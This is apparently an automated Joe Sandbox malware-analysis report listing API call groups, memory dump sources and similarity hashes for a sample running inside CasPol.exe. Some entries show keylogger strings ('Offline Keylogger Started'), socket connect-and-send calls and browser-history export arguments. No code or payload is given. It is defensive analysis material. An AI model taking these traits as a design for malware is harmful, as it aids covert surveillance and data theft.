                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCBF
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCD1
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCE3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001CCF5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                  • Instruction ID: 705fac4b2ef0ed0d18e498dac5b3377924e7d1501aba8971cd3dfab6f4dcb135
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b160ac3c7e6a73b26172b0e2cb07627f629462614d6fd128c956020dad7da9d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF06D31408A189BC640CB68E9C2C1A33F9EF88B917AC4809F48DDF500CB31FDC28AA4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0457536F
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575381
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575394
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045753A5
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045753B6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 8d149652a30e12afad380bd845acf35f63c9fd19f59cf5221e6e2b3e178d481a
                                                                                                                                                                                                                                  • Instruction ID: 1cb02f843fe8e2600739f36501c655aab1c3e71d489bdfbb587738c3b47d5e1e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d149652a30e12afad380bd845acf35f63c9fd19f59cf5221e6e2b3e178d481a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F0B77082412AEBE6016F24B9814083FA1FB95A64345251EEC11B7661FF3E6C4ABBC4
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00443305
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                                                                                                                                                                                                    • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00443317
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044332A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044333B
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044334C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                  • Instruction ID: 76e6a482bc9a1727a28655d1f271e5fc3ecde01143ea680422932a64b095765e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab870860b33c9a3cd44b9e2e3565930e421ff68453c6808a8f097650461ead98
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F05EF08075209FAB12AF2DBD014893BA0B786755306413BF41EB2772EB380D95DB8E
APIs
• _free.LIBCMT ref: 10015885
  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
• _free.LIBCMT ref: 10015897
• _free.LIBCMT ref: 100158AA
• _free.LIBCMT ref: 100158BB
• _free.LIBCMT ref: 100158CC
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
• Instruction ID: ce460e5bac6ae8aad040ed738a165eee73e0f07a81d148bf5aaa982fd25e43d9
• Opcode Fuzzy Hash: 207940b51d209e858706144c0a969e265abd99e345c3376a56f28a2680fc7459
• Instruction Fuzzy Hash: ADF03074844A35DBE601EF549CC1C1537A0FB487113BD4A4AF4506E271C732A6838F82
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 10005A13
• std::_Xinvalid_argument.LIBCPMT ref: 10005A1D
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
• Opcode ID: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
• Instruction ID: 1f1fc70b04df716a51afbffcc927e8f2192dc69e1f8a2574b42c8594fe6aa3ea
• Opcode Fuzzy Hash: a948c79c5431ef993d5c7db46d81cca16daa77eda4f2e5c9dff6410b726f20a4
• Instruction Fuzzy Hash: C4E15075A0020ADBDB20CF48D5C099FB7B6FF84392B204529E8459B218DB32FE55CBE1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID:
• String ID: invalid string position$string too long
• API String ID: 0-4289949731
• Opcode ID: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
• Instruction ID: 4e0e01030c44db973a3d1f6ba28005194938e7e7133fae708877df5374af968a
• Opcode Fuzzy Hash: ccb344d31eb48d848c024517a1bbcab67a45931089d07f9d91156cb093629b5a
• Instruction Fuzzy Hash: 48717F35B046099BDB24CE5CD88099FB3F6FF89392720492EE946C7304DB32EA50CB91
APIs
• GetWindowThreadProcessId.USER32(?,?), ref: 00416768
• GetWindowTextW.USER32(?,?,0000012C), ref: 0041679A
• IsWindowVisible.USER32(?), ref: 004167A1
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B395
  • Part of subcall function 0041B37D: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3A8
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ProcessWindow$Open$TextThreadVisible
• String ID: (FG
• API String ID: 3142014140-2273637114
• Opcode ID: fda56e45b393d4fbe729944c23874229a9f0d2b36fec767842575fa95d0cb5ce
• Instruction ID: 6337817d5adb2ff800b6fe7f9081d1b6a06097940366009b721c4d78a1625a25
• Opcode Fuzzy Hash: fda56e45b393d4fbe729944c23874229a9f0d2b36fec767842575fa95d0cb5ce
• Instruction Fuzzy Hash: FD71E6321082414AC325FB61D8A5ADFB3E4AFE4319F50453EF58A530E1EF746A49C79A
APIs
• _strpbrk.LIBCMT ref: 0044D4A8
• _free.LIBCMT ref: 0044D5C5
  • Part of subcall function 0043A854: IsProcessorFeaturePresent.KERNEL32(00000017,0043A826,?,?,?,00414BBD,?,00000000,00000000,?,0043A846,00000000,00000000,00000000,00000000,00000000), ref: 0043A856
  • Part of subcall function 0043A854: GetCurrentProcess.KERNEL32(C0000417), ref: 0043A878
  • Part of subcall function 0043A854: TerminateProcess.KERNEL32(00000000), ref: 0043A87F
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
• String ID: *?$.
• API String ID: 2812119850-3972193922
• Opcode ID: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
• Instruction ID: 2d4433a3afc190a5690657b280c6536bac4d5ba0d1806d6c31be7b1549e3be36
• Opcode Fuzzy Hash: dbad545dedeb202f26215854c3da024dc0fb99b6c0e3b260b863dc96475f25f4
• Instruction Fuzzy Hash: 7251B371E00109AFEF14DFA9C881AAEB7F5EF58318F24416FE854E7301DA799E018B54
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 10005B96
• std::_Xinvalid_argument.LIBCPMT ref: 10005BA0
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Xinvalid_argumentstd::_
                                                                                                                                                                                                                                  • String ID: invalid string position$string too long
                                                                                                                                                                                                                                  • API String ID: 909987262-4289949731
                                                                                                                                                                                                                                  • Opcode ID: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                  • Instruction ID: 6c1523fb328dcf9ae6a9c50ad7b05ab603d263373fb6ba5bb73130adc7b49d3b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9f5af590ba494f503317526f7cd22f2d922a699b17cc1a85d23b8301829a4f6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE4181717047098FA724DE58E8C095BB3E9FF846863610A2EF442C7619EB32FD15C7A1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetKeyboardLayoutNameA.USER32(?), ref: 00409601
                                                                                                                                                                                                                                    • Part of subcall function 004041F1: socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                                                                                                                                    • Part of subcall function 0040428C: connect.WS2_32(?,00F5D160,00000010), ref: 004042A5
                                                                                                                                                                                                                                    • Part of subcall function 0041B6AA: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409689,00473EE8,?,00473EE8,00000000,00473EE8,00000000), ref: 0041B6BF
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFileKeyboardLayoutNameconnectsendsocket
                                                                                                                                                                                                                                  • String ID: XCG$`AG$>G
                                                                                                                                                                                                                                  • API String ID: 2334542088-2372832151
                                                                                                                                                                                                                                  • Opcode ID: f44be819829dbbd5979bb4e2de6f637f2ceb77e339f3f40bbb8be689e254d46d
                                                                                                                                                                                                                                  • Instruction ID: 7adbea44916697806613a62f0197ef330eb15d5bc584e2d7fa9685cab7613629
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f44be819829dbbd5979bb4e2de6f637f2ceb77e339f3f40bbb8be689e254d46d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 865143321042405BC325F775D8A2AEF73D5AFE4308F50483FF84A671E2EE785949C69A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 04574C1D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04574CE8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04574CF2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: dc542435f67a4077305b1f721a395f0b79616624f89141eca1ff5ff66d397376
                                                                                                                                                                                                                                  • Instruction ID: 6f5df4a8296fa875a7398bd1d38f3be2b3949f0e0a0bc7d20a17efdec7203f35
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc542435f67a4077305b1f721a395f0b79616624f89141eca1ff5ff66d397376
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D319571A00219FFDB21DF99F98099EBFFCFB86714B10417AE804A7210E775AA45EB50
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 00442714
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004427DF
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 004427E9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                  • Instruction ID: 3cff5717343a4e3a710d875500e96c622d597d45f5ef159119de948e6b6562f0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae9165eb27f4f845c69520f3dc3d45a64db1a1f113bc22466fc6999e8739498b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E31B371A00218AFEB21DF9ADD81D9EBBFCEB85314F54406BF804A7311D6B88E41DB59
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe,00000104), ref: 10014D25
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10014DF0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10014DFA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                  • API String ID: 2506810119-3657627342
                                                                                                                                                                                                                                  • Opcode ID: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                  • Instruction ID: 1e7dba0bb730f9fc9de03a9782a9729fb1a7a61e514cee30f29b5b303d88c0bb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eaf83b87ec4df31a7860cee0cd6db682f0658942e23e4816ef17e9f2f1853395
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83316175A00258AFDB11DF95DC81D9EBBFCEB89750B2140A6F8049B221DA71DA81CB91
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 10004988
• std::_Xinvalid_argument.LIBCPMT ref: 10004992
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
• Opcode ID: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
• Instruction ID: 5dc71b71bde44702d26a4cbc12f9298653d6fc4ab722c143c4ed6f2fd59d79f2
• Opcode Fuzzy Hash: f219f81f2db817a89c88b3221649508d6ef427ce8f5576a44e3a57a9eb601318
• Instruction Fuzzy Hash: 9C31BC763053058BAB24CF5CF88095BB3E9FF857913120A3EE546C7619DB31E91487A9
APIs
• std::_Xinvalid_argument.LIBCPMT ref: 100040D8
• std::_Xinvalid_argument.LIBCPMT ref: 100040E2
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Xinvalid_argumentstd::_
• String ID: invalid string position$string too long
• API String ID: 909987262-4289949731
• Opcode ID: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
• Instruction ID: dceabf25fecf4d0f8060b32b9c351c32afdfa4cc9e92bfec45e796551365fa88
• Opcode Fuzzy Hash: b8c36c1bc06ab5f4c21a442c8b2e8ddece411d5689db3b951c93075d282b484f
• Instruction Fuzzy Hash: 9431D4B6700700CFE724CF5CE880B5BB3E5EF90691B120A2EF652C7649CB72E95087A5
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00403A2A
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,75573530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
  • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
  • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(000000FA,00465324), ref: 00403AFC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
• String ID: /sort "Visit Time" /stext "$8>G
• API String ID: 368326130-2663660666
• Opcode ID: b5b89a640bfa1adf5683e19deea28c7ebbf09eb89aff2571d37a400ae519e83d
• Instruction ID: 7eda923cdb9144c2d3fbd791e6ccfb72172be11f11f2a08a3aebfaec1b2861d2
• Opcode Fuzzy Hash: b5b89a640bfa1adf5683e19deea28c7ebbf09eb89aff2571d37a400ae519e83d
• Instruction Fuzzy Hash: E5317331A0021456CB14FBB6DC969EE7775AF90318F40017FF906B71D2EF385A8ACA99
APIs
• CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
• CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
• CreateThread.KERNEL32(00000000,00000000,004099B5,?,00000000,00000000), ref: 00409946
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
